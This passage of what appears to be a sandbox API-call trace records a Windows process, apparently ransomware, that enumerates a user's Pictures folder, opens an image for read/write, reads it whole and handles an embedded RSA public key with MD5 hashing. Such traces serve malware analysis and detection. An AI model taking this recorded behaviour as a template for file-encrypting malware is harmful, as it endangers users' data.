Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\") returned="Pt3T5YLjsfWTS8bTn\\" [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88838 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88838 | out: hHeap=0x660000) returned 1 [0060.006] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.006] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.006] PathFindFileNameW (pszPath="") returned="" [0060.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0xf393b510, ftLastAccessTime.dwHighDateTime=0x1d4d0a2, ftLastWriteTime.dwLowDateTime=0xf393b510, ftLastWriteTime.dwHighDateTime=0x1d4d0a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.007] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0xf393b510, ftLastAccessTime.dwHighDateTime=0x1d4d0a2, ftLastWriteTime.dwLowDateTime=0xf393b510, ftLastWriteTime.dwHighDateTime=0x1d4d0a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.007] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e234ca0, ftCreationTime.dwHighDateTime=0x1d4d42a, ftLastAccessTime.dwLowDateTime=0x40d4c3b0, ftLastAccessTime.dwHighDateTime=0x1d4c553, ftLastWriteTime.dwLowDateTime=0x40d4c3b0, ftLastWriteTime.dwHighDateTime=0x1d4c553, nFileSizeHigh=0x0, nFileSizeLow=0x11ce4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="af7fMK0 C.gif", cAlternateFileName="AF7FMK~1.GIF")) returned 1 [0060.007] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.007] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.007] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\af7fMK0 C.gif") returned=".gif" [0060.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\af7fMK0 C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\af7fmk0 c.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.007] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=72932) returned 1 [0060.007] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.009] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11cbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.009] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.010] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.010] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11ce4, lpOverlapped=0x0) returned 1 [0060.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.011] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.011] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.011] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.011] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.012] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.012] GetLastError () returned 0x0 [0060.012] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.012] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.012] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.012] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.012] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11ce0) returned 0x9c88ae8 [0060.012] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88838 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a28 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88880 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a40 [0060.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a70 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a88 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.013] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a70 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a88 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a88 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85a70 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a88 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a70 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree 